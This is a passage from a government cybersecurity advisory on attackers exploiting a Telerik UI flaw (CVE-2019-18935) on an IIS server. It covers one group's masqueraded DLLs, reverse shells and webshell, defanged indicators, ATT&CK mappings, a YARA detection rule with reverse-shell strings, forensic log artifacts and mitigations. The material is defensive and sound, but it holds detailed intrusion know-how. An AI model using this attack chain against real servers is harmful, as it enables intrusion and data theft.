\n\n09/25/2022 \n \n92.38.176[.]130\n\n| \n\n09/25/2022\n\n| \n\n10/07/2022 \n \n##### Threat Actor 2\n\nTA2\u2014identified as likely the cybercriminal actor XE Group\u2014often includes `xe[word]` nomenclature in original filenames and registered domains. Volexity lists this naming convention and other observed TTPs as common for this threat actor group.[[5](<https://www.volexity.com/blog/2021/12/07/xe-group-exposed-8-years-of-hacking-card-skimming-for-profit/>)]]\n\nAs early as August 2021, CISA and authoring organizations observed TA2 delivering malicious PNG files that, following analysis, were masqueraded DLL files to avoid detection [[T1036.005](<https://attack.mitre.org/versions/v12/techniques/T1036/005/> \"Masquerading: Match Legitimate Name or Location\" )]. Similar to TA1, TA2 exploited CVE-2019-18935 and was able to upload at least three unique DLL files into the `C:\\Windows\\Temp\\` directory that TA2 executed via the `w3wp.exe` process. These DLL files drop and execute reverse (remote) shell utilities for unencrypted communication with C2 IP addresses associated with the malicious domains listed in Table 3. **Note:** At the time of analysis, the domains resolved to the listed IP addresses.\n\n_Table 3: TA2 IPs and Resolving Domains_\n\n**IP Address**\n\n| \n\n**Resolving Domains** \n \n---|--- \n \n184.168.104[.]171\n\n| \n\nxework[.]com\n\nxegroups[.]com\n\nhivnd[.]com \n \n144.96.103[.]245\n\n| \n\nxework[.]com \n \nAnalysis of DLL files determined the files listed in Table 4 were dropped, decoded, and attempted to connect to the respective malicious domains. Embedded payloads dropped by the DLL files were observed using the command line utility `certutil[.]exe` and writing new files as `xesvrs[.]exe` to invoke reverse shell utilities execution.\n\n_Table 4: Identified Malicious Files_\n\n**Filename**\n\n| \n\n**Description** \n \n---|--- \n \nXEReverseShell.exe\n\n| \n\nDLL files (masqueraded as PNG files) located in the `C:\\Windows\\Temp\\` directory contain a base64 encoded file with the internal name `XEReverseShell.exe`, which was dropped into the same directory as `sortcombat.exe`.\n\nWhen executed, the reverse shell utility attempts to connect to `xework[.]com` or `xegroups[.]com` to obtain the IP address of the C2 server and port number for unencrypted communication.\n\n**Note: **It is likely the threat actors changed the file extension from .dll to .png to avoid detection. \n \nMulti-OS_ReverseShell.exe\n\n| \n\nReverse shell utility decoded from the base64 encoded file `xesmartshell.tmp`.\n\nWhen executed, it will attempt to connect to `xegroups[.]com` or `xework[.]com` to obtain the IP address of the C2 server and port number for unencrypted communication. \n \nSortVistaCompat\n\n| \n\nBase64 encoded payload dropped from `Multi-OS_ReverseShell.exe`. This file receives the C2 IP and port from `xework[.]com`. \n \nWhen the TA2 malware is executed a DLL file drops an executable (`XEReverseShell.exe`) that attempts to pull a C2 IP address and port number from `xework[.]com` or `xegroups[.]com`.\n\n * If no port or IP address is found, the program will exit.\n * If a port and IP address are found, the program will establish a listener and wait for further commands.\n\nIf communication is established between the TA2 malware and the C2:\n\n * The malware will identify the operating system (Windows or Linux) and create the appropriate shell (cmd or bash), sending system information back to the C2.\n * The C2 server may send the command `xesetshell`, causing the malware to connect to the server and download a file called small.txt\u2014a base64-encoded webshell that the malware decodes and places in the `C:\\Windows\\Temp\\` directory.\n * The C2 server may send the command `xequit`, causing the malware to sleep for a period of time determined by the threat actors.\n\nThe two files `xesmartshell.tmp` and `SortVistaCompat` have the capability to drop an Active Server Pages (ASPX) webshell\u2014a base64 encoded text file `small.txt` decoded [[T1140](<https://attack.mitre.org/versions/v12/techniques/T1140/> \"Deobfuscate/Decode Files or Information\" )] as `small.aspx` [[T1505.003](<https://attack.mitre.org/versions/v12/techniques/T1505/003/> \"Server Software Component: Web Shell\" )]\u2014to enumerate drives; to send, receive, and delete files; and to execute incoming commands. The webshell contains an interface for easily browsing files, directories, or drives on the system, and allows the user to upload or download files to any directory. No webshells were observed to be dropped on the target system, likely due to the abused service account having restrictive write permissions.\n\nFor more information on the DLLs, binaries, and webshell, see CISA [MAR-10413062-1.v1 CVE-2019-18935 Exploitation in U.S. Government IIS Server](<https://www.cisa.gov/news-events/analysis-reports/ar23-074a>).\n\n#### **MITRE ATT&CK TACTICS AND TECHNIQUES**\n\nSee Tables 5-10 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping to the MITRE ATT&CK framework, see CISA\u2019s [Decider Tool](<https://www.cisa.gov/news-events/alerts/2023/03/01/cisa-releases-decider-tool-help-mitre-attck-mapping> \"CISA Releases Decider Tool to Help with MITRE ATT&CK Mapping\" ) and [Best Practices for MITRE ATT&CK Mapping Guide](<https://www.cisa.gov/news-events/alerts/2023/01/17/cisa-updates-best-practices-mapping-mitre-attckr> \"CISA Updates Best Practices for Mapping to MITRE ATT&CK\u00ae\" ).\n\n_Table 5: Identified ATT&CK Techniques for Enterprise_\n\n**Reconnaissance**\n\n| | \n---|---|--- \n \n**Technique Title**\n\n| \n\n**ID**\n\n| \n\n**Use** \n \nActive Scanning: Vulnerability Scanning\n\n| \n\n[T1595.002](<https://attack.mitre.org/versions/v12/techniques/T1595/002/> \"Active Scanning: Vulnerability Scanning\" )\n\n| \n\nActors were observed conducting active scanning activity for vulnerable devices and specific ports. \n \n**Initial Access**\n\n| | \n \n**Technique Title**\n\n| \n\n**ID**\n\n| \n\n**Use** \n \nExploit Public-Facing Application\n\n| \n\n[T1190](<https://attack.mitre.org/versions/v12/techniques/T1190/> \"Exploit Public-Facing Application\" )\n\n| \n\nActors exploited a known vulnerability in the Microsoft IIS server. \n \n**Persistence**\n\n| | \n \n**Technique Title**\n\n| \n\n**ID**\n\n| \n\n**Use** \n \nServer Software Component: Web Shell\n\n| \n\n[T1505.003](<https://attack.mitre.org/versions/v12/techniques/T1505/003/> \"Server Software Component: Web Shell\" )\n\n| \n\nTA2\u2019s malware dropped an ASPX webshell to enumerate drives; send, receive, and delete files; and execute commands. \n \n**Defense Evasion**\n\n| | \n \n**Technique Title**\n\n| \n\n**ID**\n\n| \n\n**Use** \n \nMasquerading: Match Legitimate Name or Location\n\n| \n\n[T1036.005](<https://attack.mitre.org/versions/v12/techniques/T1036/005/> \"Masquerading: Match Legitimate Name or Location\" )\n\n| \n\nActors leveraged the legitimate `w3wp.exe` process on the IIS server to write malicious DLL files and evade detection. \n \nProcess Injection: DLL Injection\n\n| \n\n[T1055.001](<https://attack.mitre.org/versions/v12/techniques/T1055/001/> \"Process Injection: DLL Injection\" )\n\n| \n\nActors loaded newly created DLLs into a running `w3wp.exe` process. \n \nIndicator Removal: File Deletion\n\n| \n\n[T1070.004](<https://attack.mitre.org/versions/v12/techniques/T1070/004/> \"Indicator Removal: File Deletion\" )\n\n| \n\nTA1\u2019s malware deleted files with \".dll\" from the `C:\\Windows\\Temp\\` directory, which may indicate hidden malicious activity on the network. \n \nIndicator Removal: Timestomp\n\n| \n\n[T1070.006](<https://attack.mitre.org/versions/v12/techniques/T1070/006/> \"Indicator Removal: Timestomp\" )\n\n| \n\nActors modified file time attributes to insert misleading creation dates. \n \nDecode Files\n\n| \n\n[T1140](<https://attack.mitre.org/versions/v12/techniques/T1140/> \"Decode Files\" )\n\n| \n\nThe base64 encoded text file `small.txt` decoded as the webshell `small.aspx`. \n \n**Discovery**\n\n| | \n \n**Technique Title**\n\n| \n\n**ID**\n\n| \n\n**Use** \n \nFile and Directory Discovery\n\n| \n\n[T1083](<https://attack.mitre.org/versions/v12/techniques/T1083/> \"File and Directory Discovery\" )\n\n| \n\nActors enumerated the IIS server via OS fingerprinting, executed Windows processes, and collected network information.\n\nTA1\u2019s malware enumerates systems, processes, files, and directories. \n \nSystem Network Configuration Discovery\n\n| \n\n[T1016](<https://attack.mitre.org/versions/v12/techniques/T1016/> \"System Network Configuration Discovery\" )\n\n| \n\nTA1\u2019s malware gathers network parameters, including host name, domain name, DNS servers, NetBIOS ID, adapter information, IP address, subnet, gateway IP, and DHCP server. \n \n**Command and Control**\n\n| | \n \n**Technique Title**\n\n| \n\n**ID**\n\n| \n\n**Use** \n \nIngress Tool Transfer\n\n| \n\n[T1105](<https://attack.mitre.org/versions/v12/techniques/T1105/> \"Ingress Tool Transfer\" )\n\n| \n\nTA1 and TA2 uploaded malicious DLL files (some masqueraded as PNG files) to the `C:\\Windows\\Temp\\` directory. \n \nNon-Application Layer Protocol\n\n| \n\n[T1095](<https://attack.mitre.org/versions/v12/techniques/T1095/> \"Non-Application Layer Protocol\" )\n\n| \n\nActors used a non-application layer protocol (TCP) for `w3wp.exe` process exploitation, C2, and enumeration on the IIS server. \n \n**_Update June 15, 2023:_**\n\n_Table 6: Resource Development_\n\n**Technique Title**\n\n| \n\n**ID**\n\n| \n\n**Use** \n \n---|---|--- \n \nAcquire Infrastructure: Virtual Private Server\n\n| \n\n[T1583.003](<https://attack.mitre.org/versions/v12/techniques/T1583/003/>)\n\n| \n\nUnattributed APT actors were observed leveraging VPS to route traffic to targets. \n \n_Table 7: Initial Access_\n\n**Technique Title**\n\n| \n\n**ID**\n\n| \n\n**Use** \n \n---|---|--- \n \nExploit Public-Facing Application\n\n| \n\n[T1190](<https://attack.mitre.org/versions/v12/techniques/T1190/>)\n\n| \n\nAPT actors exploited CVE-2017-9248 in an FCEB agency\u2019s Microsoft IIS server. \n \n_Table 8: Execution_\n\n**Technique Title**\n\n| \n\n**ID**\n\n| \n\n**Use** \n \n---|---|--- \n \nCommand and Scripting Interpreter: Python\n\n| \n\n[T1059.006](<https://attack.mitre.org/versions/v12/techniques/T1059/006/>)\n\n| \n\nAPT actors used a Python-based script to execute a brute force attack. \n \n_Table 9: Persistence_\n\n**Technique Title**\n\n| \n\n**ID**\n\n| \n\n**Use** \n \n---|---|--- \n \nServer Software Component: Web Shell\n\n| \n\n[T1505.003](<https://attack.mitre.org/versions/v12/techniques/T1505/003/>)\n\n| \n\nAPT actors uploaded malicious webshells (sd.php, osker.aspx) to the IIS server for backdoor access and remote control. \n \n_Table 10: Command and Control_\n\n**Technique Title**\n\n| \n\n**ID**\n\n| \n\n**Use** \n \n---|---|--- \n \nIngress Tool Transfer\n\n| \n\n[T1105](<https://attack.mitre.org/versions/v12/techniques/T1105/>)\n\n| \n\nAPT actors manipulated the Document Manager to upload malicious scripts, download and delete sensitive files, and make unauthorized modifications. \n \n**_Update End_**\n\n#### **DETECTION METHODS**\n\nCISA and authoring organizations recommend that organizations review the steps listed in this section and Tables 5-10: Identified ATT&CK Techniques for Enterprise to detect similar activity on IIS servers.\n\n##### **Yara Rule**\n\nCISA developed the following YARA rule from the base proof-of-concept code for CVE-2019-18935.[[6](<https://github.com/noperator/CVE-2019-18935/blob/master/CVE-2019-18935.py>)] **Note:** Authoring organizations do not guarantee all malicious DLL files (if identified) will use the same code provided in this YARA rule.\n\n`rule CISA_10424018_01 { \nmeta: \nAuthor = \"CISA Code & Media Analysis\" \nIncident = \"10424018\" \nDate = \"2023-02-07\" \nLast_Modified = \"20230216_1500\" \nActor = \"n/a\" \nFamily = \"n/a\" \nCapabilities = \"n/a\" \nMalware_Type = \"n/a\" \nTool_Type = \"n/a\" \nDescription = \"Detects open-source exploit samples\" \nSHA256 = \"n/a\" \nstrings: \n$s0 = { 3D 20 7B 20 22 63 6D 22 2C 20 22 64 2E 65 22 2C } \n$s1 = { 20 22 78 22 2C 20 22 65 22 20 7D 3B } \n$s2 = { 52 65 76 65 72 73 65 53 68 65 6C 6C 28 29 } \n$s3 = { 54 65 6C 65 72 69 6B 20 55 49 } \n$s4 = { 66 69 6C 65 6E 61 6D 65 5F 6C 6F 63 61 6C } \n$s5 = { 66 69 6C 65 6E 61 6D 65 5F 72 65 6D 6F 74 65 } \n$s6 = { 41 55 43 69 70 68 65 72 2E 65 6E 63 72 79 70 74 } \n$s7 = { 31 32 31 66 61 65 37 38 31 36 35 62 61 33 64 34 } \n$s8 = { 43 6F 6E 6E 65 63 74 53 74 61 67 69 6E 67 53 65 72 76 65 72 28 29 } \n$s9 = { 53 74 61 67 69 6E 67 53 65 72 76 65 72 53 6F 63 6B 65 74 } \n$s10 = { 2A 62 75 66 66 65 72 20 3D 20 28 75 6E 73 69 67 6E 65 } \n$s11 = { 28 2A 29 28 29 29 62 75 66 66 65 72 3B 0A 20 20 20 20 66 75 6E 63 28 29 3B } \n$s12 = { 75 70 6C 6F 61 64 28 70 61 79 6C 6F 61 64 28 54 65 6D 70 54 61 72 67 65 74 } \n$s13 = { 36 32 36 31 36 66 33 37 37 35 36 66 32 66 } \ncondition: \n($s0 and $s1 and $s2) or ($s3 and $s4 and $s5 and $s6 and $s7) or ($s8 and $s9 and $s10 and $s11) or ($s12 and $s13) \n}`\n\n##### **Log Collection, Retention, and Analysis**\n\nCISA, FBI, and MS-ISAC recommend that organizations utilize a centralized log collection and monitoring capability, as well as implement or increase logging and forensic data retention. Longer retention policies improve the availability of data for forensic analysis and aid thorough identification of incident scope.\n\n * **Centralized log collection and monitoring** allows for the discovery of webshell and other exploit activity. For example, organizations should monitor for external connections made from the IIS server to unknown external IP addresses. Logging may also be available\u2014if enabled at the router or firewall\u2014for any outbound connections initiated with PowerShell.\n * **Access- and security-focused firewall (e.g., Web Application Firewall [WAF]) logs** can be collected and stored for use in both detection and forensic analysis activities. Organizations should use a WAF to guard against publicly known web application vulnerabilities, in addition to guarding against common web application attacks.\n\n##### **Creation of Malicious DLLs**\n\nCISA, FBI, and MS-ISAC recommend that organizations use **process monitoring**\u2014which provides visibility into file system and application process activity\u2014to detect suspicious executable files running from the `C:\\Windows\\Temp\\` directory. Process monitoring via Windows Event Code 4688 will detect the legitimate `w3wp.exe` process running suspicious DLL files and other anomalous child processes. **Note:** Enabling this event may inundate security event logging. Use centralized log collection to prevent log rollover, increase log retention and archiving, and/or enable command line event logging.\n\nForensic analysis commonly identified the threat actors taking the following steps:\n\n 1. Create one of the DLL files (`C:\\Windows\\Temp\\1665890187.8690152.dll`) by process `w3wp.exe` PID 6484.\n 2. Load the newly created DLL into a currently running IIS process, `w3wp.exe` PID 6484. \n 3. Make a TCP connection using `w3wp.exe` PID 6484 to `45.77.212[.]12` over port 443.\n 4. Invoke `C:\\Windows\\System32\\vcruntime140.dll` (Windows C runtime library) to execute payload.\n\nSteps 1 and 2 occur every time a malicious DLL file is created. In some cases, an ASP .NET temp file was created, but this may have indicated benign IIS server activity. **Note:** The Process ID (PID) used in this example is unique to this investigation and is not universal. IP address `45.77.212[.]12` correlates to TA1, but the pattern can be used as general practice to identify similar activity.\n\n##### **Additional Searching for IIS Servers**\n\nThe following information was derived from artifact analysis and is provided to equip IT infrastructure defenders searching for similar activity on an IIS server. Several artifacts can be referenced to assist in determining if CVE-2019-18935 has been successfully exploited.\n\n##### _**File Type: DLL**_\n\n##### _Location: - %SystemDrive%\\Windows\\Temp\\_\n\nWhen this CVE is exploited, it uploads malicious DLL files to the `C:\\Windows\\Temp\\` directory. The malicious DLL file naming convention translates to the exact time the file was uploaded to the server.\n\nThe time is represented in a series of digits, known as Unix Epoch time. The files observed during this investigation contained two sets of digits separated by a period (.) before the DLL extension (.dll). _Example: `1667206973.2270932.dll`_\n\nNearly all recovered files contain a series of 10 digits to the left of the period (.) and seven digits to the right. However, one file contained only five digits in the second set, which should be taken into consideration when writing regex patterns to search for the existence of these files. _Example Regex: `\\d{10}\\.\\d{1,8}\\.dll`_\n\nThese numbers can be copied and translated from digits into readable language with the month, day, year, hour, minute, and seconds displayed.\n\n##### _**Log Type: IIS**_\n\n##### _Location: - %SystemDrive%\\inetpub\\logs\\LogFiles_\n\nWhen investigating IIS logs, specific fields were searched for and captured during the time of each connection.\n\nIf the Unix Epoch time signature has been translated from a DLL filename, specific logs can be searched based on that time. However, if the Unix Epoch time signature has not been translated, the following will still work, but may take longer for the query to run.\n\nThe four most important fields to identify this traffic are noted in the following table. These descriptions are sourced directly from Microsoft.[[7](<https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis>)]\n\n_Table 11: Four Fields Searched in IIS Logs_\n\n**General Name**\n\n| \n\n**Field Name**\n\n| \n\n**Description** \n \n---|---|--- \n \nMethod\n\n| \n\ncs-method\n\n| \n\nRequested action; for example, a GET method \n \nURI Stem\n\n| \n\ncs-uri-stem\n\n| \n\nUniversal Resource Identifier (URI), or target, of the action \n \nURI Query\n\n| \n\ncs-uri-query\n\n| \n\nThe query, if any, that the client was trying to perform; A URI query is necessary only for dynamic pages. \n \nProtocol Status\n\n| \n\nsc-status\n\n| \n\nHypertext Transfer Protocol (HTTP) or File Transfer Protocol (FTP) status code \n \n**Note:** Depending on how logs are collected and stored, the field names may not be an exact match; this should be taken into consideration when constructing queries.\n\nWhen ingesting logs into security information and event management (SIEM), the final field names did not use a hyphen (-) but used an underscore (_).\n\n_Example: cs_method instead of cs-method_\n\n##### _Artifacts:_\n\n_Table 12: Information Contained in Two Observed IIS Events_\n\n**Field Name**\n\n| \n\n**Artifact** \n \n---|--- \n \ncs-method\n\n| \n\nPOST \n \n>cs-uri-stem\n\n| \n\n/Telerik.Web.UI.WebResource.axd \n \ncs-uri-query\n\n| \n\ntype=rau \n \nsc-status\n\n| \n\n200 and 302 \n \nWhen reviewing logs, two IIS events were observed with the same timestamp each time this CVE-2019-18935 was exploited. Both events contained the same information in the cs-method, cs-uri-stem, and cs-uri-query. One event had a sc-status of 200 and the other had a sc-status of 302.\n\n##### _**Log Type: Windows Event Application Logs**_\n\n##### _Location: -%SystemDrive%\\Windows\\System32\\winevt\\logs\\Application.evtx_\n\nKroll Artifact Parser and Extractor (KAPE), a forensic artifact collector and parser, was used to extract the Windows event logs from a backup image of the compromised IIS server. All field names refer to the labels provided via KAPE exports. The strings are of value and can be used to locate other artifacts if different tools are used. **Note:** The payload data in the following table has been shortened to only necessary strings to obscure and protect victim information.\n\n_Table 13: Example Payload Data_\n\n**EventID**\n\n| \n\n**Payload** \n \n---|--- \n \n1309\n\n| \n\n3005, An unhandled exception has occurred[*redacted*]w3wp.exe[*redacted*]InvalidCastException, Unable to cast object of type 'System.Configuration.Install.AssemblyInstaller' to type 'Telerik.Web.UI.IAsyncUploadConfiguration'.\\n at Telerik.Web.UI.AsyncUploadHandler.GetConfiguration(String rawData)\\n at Telerik.Web.UI.AsyncUploadHandler.EnsureSetup()\\n at Telerik.Web.UI.AsyncUploadHandler.ProcessRequest(HttpContext context)\\n at Telerik.Web.UI.HandlerRouter.ProcessHandler(String handlerKey, HttpContext context)\\n at Telerik.Web.UI.WebResource.ProcessRequest(HttpContext context)\\n at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()\\n at System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step)\\n at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean&amp; completedSynchronously)\\n\\n, [*redacted*]/Telerik.Web.UI.WebResource.axd?type=rau, /Telerik.Web.UI.WebResource.axd, [*redacted*], False, [*redacted*], 15, [*redacted*], False, at Telerik.Web.UI.AsyncUploadHandler.GetConfiguration(String rawData)\\n at Telerik.Web.UI.AsyncUploadHandler.EnsureSetup()\\n at Telerik.Web.UI.AsyncUploadHandler.ProcessRequest(HttpContext context)\\n at Telerik.Web.UI.HandlerRouter.ProcessHandler(String handlerKey, HttpContext context)\\n at Telerik.Web.UI.WebResource.ProcessRequest(HttpContext context)\\n at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()\\n at System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step)\\n at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean&amp; completedSynchronously)\\n\",\"Binary\":\"\"}} \n \nAuthoring organizations recommend looking for the following key strings in the payload:\n\n * `w3wp.exe`: This is the parent process that executes the code inside the malicious DLLs.\n * `System.Configuration.Install.AssemblyInstaller`: Figure 1 is from the creator\u2019s GitHub repo,[[8](<https://github.com/noperator/CVE-2019-18935>)] where the string can be observed in the code. As presented by Bishop Fox and proven during authoring organizations\u2019 investigation of IIS server logs, an exception does not mean that the exploit failed, but more likely that it executed successfully.[[4](<https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui>)]\n\n![Figure 1: Threat Actor Assembly Installer](/sites/default/files/styles/large/public/2023-03/threat_actor_assembly_installer.png?itok=HoHLLiTc)\n\n_Figure 1: Threat Actor Assembly Installer_\n\nIf a Werfault crash report was written, Windows event application logs may contain evidence of this\u2014 even if the DLLs have been removed from the system as part of a cleanup effort by the threat actors.\n\n_Table 14: Example Threat Actor Cleanup_\n\n**EventID**\n\n| \n\n**ExecutableInfo**\n\n| \n\n**MapDescription**\n\n| \n\n**Payload** \n \n---|---|---|--- \n \n1000\n\n| \n\nw3wp.exe |1664175639.65719.dll\n\n|c:\\windows\\system32\\inetsrv\\w3wp.exe |C:\\Windows\\Temp\\1664175639.65719.dll\n\n| \n\nApplication Error\n\n| \n\n{\"EventData\":{\"Data\":\"w3wp.exe, 8.5.9600.16384, 5215df96, 1664175639.65719.dll, 0.0.0.0, 63314d94, c00000fd, 00000000000016f8, 1708, 01d8d0a5f84af443, c:\\\\\\windows\\\\\\system32\\\\\\inetsrv\\\\\\w3wp.exe, C:\\\\\\Windows\\\\\\Temp\\\\\\1664175639.65719.dll, eed89eeb-3d68-11ed-817c-005056990ed7\",\"Binary\":\"\"}} \n \n1001\n\n| \n\nw3wp.exe |1664175639.65719.dll |C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_w3wp.exe |C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_w3wp.exe |C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_w3wp.exe\n\n| \n\nApplication Crash\n\n| \n\n{\"EventData\":{\"Data\":\"0, APPCRASH, Not available, 0, w3wp.exe, 8.5.9600.16384, 5215df96, 1664175639.65719.dll, 0.0.0.0, 63314d94, c00000fd, 00000000000016f8, \\nC:\\\\\\Windows\\\\\\Temp\\\\\\WERE3F6.tmp.appcompat.txt\\nC:\\\\\\Windows\\\\\\Temp\\\\\\WERE639.tmp.WERInternalMetadata.xml\\nC:\\\\\\ProgramData\\\\\\Microsoft\\\\\\Windows\\\\\\WER\\\\\\ReportQueue\\\\\\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656\\\\\\memory.hdmp\\nC:\\\\\\ProgramData\\\\\\Microsoft\\\\\\Windows\\\\\\WER\\\\\\ReportQueue\\\\\\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656\\\\\\triagedump.dmp, C:\\\\\\ProgramData\\\\\\Microsoft\\\\\\Windows\\\\\\WER\\\\\\ReportQueue\\\\\\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656, 0, eed89eeb-3d68-11ed-817c-005056990ed7, 4\",\"Binary\":\"\"}} \n \nThe EventID field maps to Windows EventIDs for an easy filter. Users can leverage the Windows EventIDs to find malicious DLL with the Unix Epoch time-based name inside the C:\\Windows\\Temp\\ directory.\n\nDepending how log analysis is performed, various filters can be determined. However, if regex is available, the example listed in Table 14 above can be reused to match the Unix Epoch timestamp convention to assist in filtering.\n\n##### _Additional Analysis_\n\nWhen evidence of malicious DLLs is found, reverse engineering will need to be conducted to fully understand what actions occur as the malicious files could do nearly anything. Leveraging Windows security event logs, as well as Windows PowerShell logs, may provide insight into what actions the DLLs are taking. CISA and authoring organizations recommend the following process:\n\n 1. [Convert](<https://gchq.github.io/CyberChef/#recipe=From_UNIX_Timestamp\$'Seconds%20\\(s\$'\\)&input=MTU5NjgzNTMyOQ> \"UNIX Timestamp Converter\" ) any discovered malicious DLL timestamps to readable format.\n 2. Export the Windows security event and PowerShell logs from the device. \n * _Default path: %SystemDrive%\\Windows\\System32\\winevt\\logs\\Windows PowerShell_\n * _Default path: %SystemDrive%\\Windows\\System32\\winevt\\logs\\Security.evtx_\n 3. Filter based on identified timestamps.\n 4. Search for new processes created via `w3wp.exe` in Windows security event logs (e.g., _Windows EventID 4688 New Process created_).\n 5. Search for new PIDs from identified events. Investigate to determine if they spawned any other processes. \n * _Example: CMD.EXE launching PowerShell or running other commands such as nslookup or netstat. **Note:** This is not an exhaustive list._\n 6. Search for EventID 600 in PowerShell logs.\n\n##### _Trellix XDR Platform Searching_\n\nIf Trellix XDR Platform is deployed in an environment and a standard HX triage audit is completed in a timely manner of the suspected use of CVE-2019-18935, an organization can search for file write events from known web processes. This will identify the executables written by the web server process. CISA and authoring organizations specifically recommend searching for the following field value pair:\n\n_Table 15: Field Value Pair for Searching_\n\n**Field**\n\n| \n\n**Value Begins With** \n \n---|--- \n \nTextAtLowestOffset\n\n| \n\nMZ \n \n#### **MITIGATIONS**\n\n**Note:** These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA\u2019s [Cross-Sector Cybersecurity Performance Goals](<https://www.cisa.gov/cpg> \"Cross-Sector Cybersecurity Performance Goals\" ) for more information on the CPGs, including additional recommended baseline protections.\n\n##### **Manage Vulnerabilities and Configurations**\n\n * **Upgrade all instances of Telerik UI ASP.NET AJAX to the latest version after appropriate testing.** Keep all software up to date and prioritize patching to [known exploited vulnerabilities (KEVs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog> \"Known Exploited Vulnerabilities Catalog\" ). [CPG 5.1]\n * **Prioritize remediation of vulnerabilities on internet-facing systems.** For additional guidance, see CISA Insights - Remediate Vulnerabilities for Internet-Accessible Systems. [CPG 5.1]\n * **Implement a patch management solution** to ensure compliance with the latest security patches. A patch management solution that inventories all software running in addition to vulnerability scanning is recommended.\n * **Ensure vulnerability scanners are configured to scan a comprehensive scope of devices and locations.** For example, as noted in the Technical Details section, the victim organization had the appropriate plugin for CVE-2019-18935, but the vulnerability went undetected due to the Telerik UI software being installed in a file path not typically scanned. To identify unpatched instances of software vulnerabilities, organizations using vulnerability scanners should be aware that all installations may not be considered \u201ctypical\u201d and may require full file scans of web applications. \n * **Note:** Vulnerability scanners may have limitations in detecting vulnerabilities, such as only being able to identify Windows Installer-installed applications, which was the case with this agency\u2019s vulnerability scanner. The Telerik UI software was installed via a continuous integration (CI) and continuous delivery (CD) pipeline rather than the Windows Installer. This highlights the importance of using a comprehensive approach for vulnerability scanning that considers all potential installation methods and file paths.\n * **Validate output from patch management and vulnerability scanning solutions against running services** to check for discrepancies and account for all services.\n\n##### **Segment Networks Based on Function**\n\n * **Implement network segmentation to separate network segments based on role and functionality.** Proper network segmentation significantly reduces the ability for threat actor lateral movement by controlling traffic flows between\u2014and access to\u2014various subnetworks. (See CISA\u2019s Layering Network Security Through Segmentation infographic and the National Security Agency\u2019s [Segment Networks and Deploy Application-Aware Defenses](<https://media.defense.gov/2019/Sep/09/2002180325/-1/-1/0/Segment%20Networks%20and%20Deploy%20Application%20Aware%20Defenses%20-%20Copy.pdf> \"SEGMENT NETWORKS AND DEPLOY APPLICATION-AWARE DEFENSES\" ).) [[CPG 8.1](<https://www.cisa.gov/sites/default/files/publications/2022_00092_CISA_CPG_Report_508c.pdf>)]\n * **Isolate similar systems and implement micro-segmentation with granular access and policy restrictions** to modernize cybersecurity and adopt zero trust principles for both network perimeter and internal devices. Logical and physical segmentation are critical to limiting and preventing lateral movement, privilege escalation, and exfiltration. Utilize access control lists (ACLs), hardened firewalls, and network monitoring devices to regulate, monitor, and audit cross-segment access and data transfers.\n\n##### **Other Best Practice Mitigation Recommendations**\n\n * Implement phishing-resistant multifactor authentication (MFA) for as many services possible\u2014particularly for webmail, virtual private networks (VPNs), accounts that access critical systems, and privileged accounts that manage backups. \n * MFA can still be leveraged for secure access using a jump server\u2014an asset placed between the external and internal networks that serves as an intermediary for access\u2014to facilitate connections if assets do not have the capability to support MFA implementation.\n * For additional guidance on secure MFA configurations, visit [cisa.gov/mfa](<http://www.cisa.gov/mfa> \"MFA\" ). [CPG 1.3]\n * **Monitor and analyze activity logs generated from Microsoft IIS and remote PowerShell.** Collect access and security focused logs (IDS/IDPS, firewall, DLP, VPN) and ensure logs are securely stored for a specified duration informed by risk or pertinent regulatory guidance. [CPG 3.1, 3.2] \n * **Evaluate user permissions** and maintain separate user accounts for all actions and activities not associated with the administrator role, e.g., for business email, web browsing, etc. All privileges should be reevaluated on a recurring basis to validate continued need for a given set of permissions. [CPG 1.5]\n * **Limit service accounts to the minimum permissions necessary to run services.** CISA observed numerous error messages in network logs indicative of failed attempts to write files to additional directories or move laterally.\n * **Maintain a robust asset management policy** through comprehensive documentation of assets, tracking current version information to maintain awareness of outdated software, and mapping assets to business and critical functions. \n * Determine the need and functionality of assets that require public internet exposure. [CPG 2.3]\n\n#### **VALIDATE SECURITY CONTROLS**\n\nIn addition to applying mitigations, CISA, FBI, and MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and co-sealers recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.\n\nTo get started:\n\n 1. Select an ATT&CK technique described in this advisory (see Tables 5-10).\n 2. Align your security technologies against the selected technique.\n 3. Test your technologies against the technique.\n 4. Analyze your detection and prevention technologies\u2019 performance.\n 5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.\n 6. Tune your security program\u2014including people, processes, and technologies\u2014based on the data generated by this process.\n\nCISA, FBI, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.\n\n#### **RESOURCES**\n\n[UNIX Timestamp Converter](<https://gchq.github.io/CyberChef/#recipe=From_UNIX_Timestamp\$'Seconds%20\\(s\$'\\)&input=MTU5NjgzNTMyOQ> \"UNIX Timestamp Converter\" )\n\n#### 